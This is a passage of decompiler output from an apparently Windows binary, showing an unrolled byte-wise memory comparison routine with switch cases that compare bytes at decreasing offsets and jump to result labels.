																					__ecx =  *(__esi - 7) & 0x000000ff;
																					__eax =  *(__edx - 7) & 0x000000ff;
																					__ecx = ( *(__esi - 7) & 0x000000ff) - ( *(__edx - 7) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t757 = __ecx > 0;
																						__eflags = _t757;
																						__eax = 0 | _t757;
																						__ecx = _t757 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L400;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xb:
																	L480:
																	__eax =  *(__esi - 0xb);
																	__eflags =  *(__esi - 0xb) -  *(__edx - 0xb);
																	if( *(__esi - 0xb) ==  *(__edx - 0xb)) {
																		goto L493;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xb) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t917 = __ecx > 0;
																			__eflags = _t917;
																			__eax = 0 | _t917;
																			__ecx = _t917 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xa) & 0x000000ff;
																			__eax =  *(__edx - 0xa) & 0x000000ff;
																			__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t923 = __ecx > 0;
																				__eflags = _t923;
																				__eax = 0 | _t923;
																				__ecx = _t923 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 9) & 0x000000ff;
																				__eax =  *(__edx - 9) & 0x000000ff;
																				__ecx = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t929 = __ecx > 0;
																					__eflags = _t929;
																					__eax = 0 | _t929;
																					__ecx = _t929 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 8) & 0x000000ff;
																					__eax =  *(__edx - 8) & 0x000000ff;
																					__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t935 = __ecx > 0;
																						__eflags = _t935;
																						__eax = 0 | _t935;
																						__ecx = _t935 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L493;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xc:
																	L188:
																	_t1061 =  *(_t1354 - 0xc);
																	__eflags = _t1061 -  *(_t1340 - 0xc);
																	if(_t1061 ==  *(_t1340 - 0xc)) {
																		goto L201;
																	} else {
																		_t1270 = (_t1061 & 0x000000ff) - ( *(_t1340 - 0xc) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t355 = _t1270 > 0;
																			__eflags = _t355;
																			_t1270 = (0 | _t355) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0xb) & 0x000000ff) - ( *(_t1340 - 0xb) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t361 = _t1270 > 0;
																				__eflags = _t361;
																				_t1270 = (0 | _t361) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0xa) & 0x000000ff) - ( *(_t1340 - 0xa) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t367 = _t1270 > 0;
																					__eflags = _t367;
																					_t1270 = (0 | _t367) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 9) & 0x000000ff) - ( *(_t1340 - 9) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t373 = _t1270 > 0;
																						__eflags = _t373;
																						_t1270 = (0 | _t373) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L201;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0xd:
																	L281:
																	__eax =  *(__esi - 0xd);
																	__eflags =  *(__esi - 0xd) -  *(__edx - 0xd);
																	if( *(__esi - 0xd) ==  *(__edx - 0xd)) {
																		goto L294;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xd) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t531 = __ecx > 0;
																			__eflags = _t531;
																			__eax = 0 | _t531;
																			__ecx = _t531 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xc) & 0x000000ff;
																			__eax =  *(__edx - 0xc) & 0x000000ff;
																			__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t537 = __ecx > 0;
																				__eflags = _t537;
																				__eax = 0 | _t537;
																				__ecx = _t537 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xb) & 0x000000ff;
																				__eax =  *(__edx - 0xb) & 0x000000ff;
																				__ecx = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t543 = __ecx > 0;
																					__eflags = _t543;
																					__eax = 0 | _t543;
																					__ecx = _t543 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xa) & 0x000000ff;
																					__eax =  *(__edx - 0xa) & 0x000000ff;
																					__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t549 = __ecx > 0;
																						__eflags = _t549;
																						__eax = 0 | _t549;
																						__ecx = _t549 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L294;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xe:
																	L374:
																	__eax =  *(__esi - 0xe);
																	__eflags =  *(__esi - 0xe) -  *(__edx - 0xe);
																	if( *(__esi - 0xe) ==  *(__edx - 0xe)) {
																		goto L387;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xe) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t713 = __ecx > 0;
																			__eflags = _t713;
																			__eax = 0 | _t713;
																			__ecx = _t713 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xd) & 0x000000ff;
																			__eax =  *(__edx - 0xd) & 0x000000ff;
																			__ecx = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t719 = __ecx > 0;
																				__eflags = _t719;
																				__eax = 0 | _t719;
																				__ecx = _t719 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xc) & 0x000000ff;
																				__eax =  *(__edx - 0xc) & 0x000000ff;
																				__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t725 = __ecx > 0;
																					__eflags = _t725;
																					__eax = 0 | _t725;
																					__ecx = _t725 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xb) & 0x000000ff;
																					__eax =  *(__edx - 0xb) & 0x000000ff;
																					__ecx = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t731 = __ecx > 0;
																						__eflags = _t731;
																						__eax = 0 | _t731;
																						__ecx = _t731 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L387;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xf:
																	L467:
																	__eax =  *(__esi - 0xf);
																	__eflags =  *(__esi - 0xf) -  *(__edx - 0xf);
																	if( *(__esi - 0xf) ==  *(__edx - 0xf)) {
																		goto L480;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xf) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t892 = __ecx > 0;
																			__eflags = _t892;
																			__eax = 0 | _t892;
																			__ecx = _t892 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xe) & 0x000000ff;
																			__eax =  *(__edx - 0xe) & 0x000000ff;
																			__ecx = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t898 = __ecx > 0;
																				__eflags = _t898;
																				__eax = 0 | _t898;
																				__ecx = _t898 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xd) & 0x000000ff;
																				__eax =  *(__edx - 0xd) & 0x000000ff;
																				__ecx = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t904 = __ecx > 0;
																					__eflags = _t904;
																					__eax = 0 | _t904;
																					__ecx = _t904 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xc) & 0x000000ff;
																					__eax =  *(__edx - 0xc) & 0x000000ff;
																					__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t910 = __ecx > 0;
																						__eflags = _t910;
																						__eax = 0 | _t910;
																						__ecx = _t910 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L480;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x10:
																	L175:
																	_t1060 =  *(_t1354 - 0x10);
																	__eflags = _t1060 -  *(_t1340 - 0x10);
																	if(_t1060 ==  *(_t1340 - 0x10)) {
																		goto L188;
																	} else {
																		_t1270 = (_t1060 & 0x000000ff) - ( *(_t1340 - 0x10) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t330 = _t1270 > 0;
																			__eflags = _t330;
																			_t1270 = (0 | _t330) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0xf) & 0x000000ff) - ( *(_t1340 - 0xf) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t336 = _t1270 > 0;
																				__eflags = _t336;
																				_t1270 = (0 | _t336) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0xe) & 0x000000ff) - ( *(_t1340 - 0xe) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t342 = _t1270 > 0;
																					__eflags = _t342;
																					_t1270 = (0 | _t342) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 0xd) & 0x000000ff) - ( *(_t1340 - 0xd) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t348 = _t1270 > 0;
																						__eflags = _t348;
																						_t1270 = (0 | _t348) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L188;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0x11:
																	L268:
																	__eax =  *(__esi - 0x11);
																	__eflags =  *(__esi - 0x11) -  *(__edx - 0x11);
																	if( *(__esi - 0x11) ==  *(__edx - 0x11)) {
																		goto L281;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x11) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t506 = __ecx > 0;
																			__eflags = _t506;
																			__eax = 0 | _t506;
																			__ecx = _t506 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x10) & 0x000000ff;
																			__eax =  *(__edx - 0x10) & 0x000000ff;
																			__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t512 = __ecx > 0;
																				__eflags = _t512;
																				__eax = 0 | _t512;
																				__ecx = _t512 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xf) & 0x000000ff;
																				__eax =  *(__edx - 0xf) & 0x000000ff;
																				__ecx = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t518 = __ecx > 0;
																					__eflags = _t518;
																					__eax = 0 | _t518;
																					__ecx = _t518 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xe) & 0x000000ff;
																					__eax =  *(__edx - 0xe) & 0x000000ff;
																					__ecx = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t524 = __ecx > 0;
																						__eflags = _t524;
																						__eax = 0 | _t524;
																						__ecx = _t524 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L281;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x12:
																	L361:
																	__eax =  *(__esi - 0x12);
																	__eflags =  *(__esi - 0x12) -  *(__edx - 0x12);
																	if( *(__esi - 0x12) ==  *(__edx - 0x12)) {
																		goto L374;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x12) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t688 = __ecx > 0;
																			__eflags = _t688;
																			__eax = 0 | _t688;
																			__ecx = _t688 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x11) & 0x000000ff;
																			__eax =  *(__edx - 0x11) & 0x000000ff;
																			__ecx = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t694 = __ecx > 0;
																				__eflags = _t694;
																				__eax = 0 | _t694;
																				__ecx = _t694 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x10) & 0x000000ff;
																				__eax =  *(__edx - 0x10) & 0x000000ff;
																				__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t700 = __ecx > 0;
																					__eflags = _t700;
																					__eax = 0 | _t700;
																					__ecx = _t700 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xf) & 0x000000ff;
																					__eax =  *(__edx - 0xf) & 0x000000ff;
																					__ecx = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t706 = __ecx > 0;
																						__eflags = _t706;
																						__eax = 0 | _t706;
																						__ecx = _t706 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L374;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x13:
																	L454:
																	__eax =  *(__esi - 0x13);
																	__eflags =  *(__esi - 0x13) -  *(__edx - 0x13);
																	if( *(__esi - 0x13) ==  *(__edx - 0x13)) {
																		goto L467;
																	} else {
																		__eax =  *(__edx - 0x13) & 0x000000ff;
																		__ecx =  *(__esi - 0x13) & 0x000000ff;
																		__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t867 = __ecx > 0;
																			__eflags = _t867;
																			__eax = 0 | _t867;
																			__ecx = _t867 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x12) & 0x000000ff;
																			__eax =  *(__edx - 0x12) & 0x000000ff;
																			__ecx = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t873 = __ecx > 0;
																				__eflags = _t873;
																				__eax = 0 | _t873;
																				__ecx = _t873 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x11) & 0x000000ff;
																				__eax =  *(__edx - 0x11) & 0x000000ff;
																				__ecx = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t879 = __ecx > 0;
																					__eflags = _t879;
																					__eax = 0 | _t879;
																					__ecx = _t879 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x10) & 0x000000ff;
																					__eax =  *(__edx - 0x10) & 0x000000ff;
																					__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t885 = __ecx > 0;
																						__eflags = _t885;
																						__eax = 0 | _t885;
																						__ecx = _t885 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L467;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x14:
																	L162:
																	_t1059 =  *(_t1354 - 0x14);
																	__eflags = _t1059 -  *(_t1340 - 0x14);
																	if(_t1059 ==  *(_t1340 - 0x14)) {
																		goto L175;
																	} else {
																		_t1270 = (_t1059 & 0x000000ff) - ( *(_t1340 - 0x14) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t305 = _t1270 > 0;
																			__eflags = _t305;
																			_t1270 = (0 | _t305) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0x13) & 0x000000ff) - ( *(_t1340 - 0x13) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t311 = _t1270 > 0;
																				__eflags = _t311;
																				_t1270 = (0 | _t311) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0x12) & 0x000000ff) - ( *(_t1340 - 0x12) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t317 = _t1270 > 0;
																					__eflags = _t317;
																					_t1270 = (0 | _t317) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 0x11) & 0x000000ff) - ( *(_t1340 - 0x11) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t323 = _t1270 > 0;
																						__eflags = _t323;
																						_t1270 = (0 | _t323) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L175;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0x15:
																	L255:
																	__eax =  *(__esi - 0x15);
																	__eflags =  *(__esi - 0x15) -  *(__edx - 0x15);
																	if( *(__esi - 0x15) ==  *(__edx - 0x15)) {
																		goto L268;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x15) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t481 = __ecx > 0;
																			__eflags = _t481;
																			__eax = 0 | _t481;
																			__ecx = _t481 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x14) & 0x000000ff;
																			__eax =  *(__edx - 0x14) & 0x000000ff;
																			__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t487 = __ecx > 0;
																				__eflags = _t487;
																				__eax = 0 | _t487;
																				__ecx = _t487 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x13) & 0x000000ff;
																				__eax =  *(__edx - 0x13) & 0x000000ff;
																				__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t493 = __ecx > 0;
																					__eflags = _t493;
																					__eax = 0 | _t493;
																					__ecx = _t493 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x12) & 0x000000ff;
																					__eax =  *(__edx - 0x12) & 0x000000ff;
																					__ecx = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t499 = __ecx > 0;
																						__eflags = _t499;
																						__eax = 0 | _t499;
																						__ecx = _t499 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L268;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x16:
																	L348:
																	__eax =  *(__esi - 0x16);
																	__eflags =  *(__esi - 0x16) -  *(__edx - 0x16);
																	if( *(__esi - 0x16) ==  *(__edx - 0x16)) {
																		goto L361;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x16) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t663 = __ecx > 0;
																			__eflags = _t663;
																			__eax = 0 | _t663;
																			__ecx = _t663 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x15) & 0x000000ff;
																			__eax =  *(__edx - 0x15) & 0x000000ff;
																			__ecx = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t669 = __ecx > 0;
																				__eflags = _t669;
																				__eax = 0 | _t669;
																				__ecx = _t669 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x14) & 0x000000ff;
																				__eax =  *(__edx - 0x14) & 0x000000ff;
																				__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t675 = __ecx > 0;
																					__eflags = _t675;
																					__eax = 0 | _t675;
																					__ecx = _t675 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x13) & 0x000000ff;
																					__eax =  *(__edx - 0x13) & 0x000000ff;
																					__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t681 = __ecx > 0;
																						__eflags = _t681;
																						__eax = 0 | _t681;
																						__ecx = _t681 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L361;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x17:
																	L441:
																	__eax =  *(__esi - 0x17);
																	__eflags =  *(__esi - 0x17) -  *(__edx - 0x17);
																	if( *(__esi - 0x17) ==  *(__edx - 0x17)) {
																		goto L454;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x17) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t841 = __ecx > 0;
																			__eflags = _t841;
																			__eax = 0 | _t841;
																			__ecx = _t841 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x16) & 0x000000ff;
																			__eax =  *(__edx - 0x16) & 0x000000ff;
																			__ecx = ( *(__esi - 0x16) & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t847 = __ecx > 0;
																				__eflags = _t847;
																				__eax = 0 | _t847;
																				__ecx = _t847 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x15) & 0x000000ff;
																				__eax =  *(__edx - 0x15) & 0x000000ff;
																				__ecx = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t853 = __ecx > 0;
																					__eflags = _t853;
																					__eax = 0 | _t853;
																					__ecx = _t853 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x14) & 0x000000ff;
																					__eax =  *(__edx - 0x14) & 0x000000ff;
																					__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t859 = __ecx > 0;
																						__eflags = _t859;
																						__eax = 0 | _t859;
																						__ecx = _t859 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L454;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x18:
																	L149:
																	_t1058 =  *(_t1354 - 0x18);
																	__eflags = _t1058 -  *(_t1340 - 0x18);
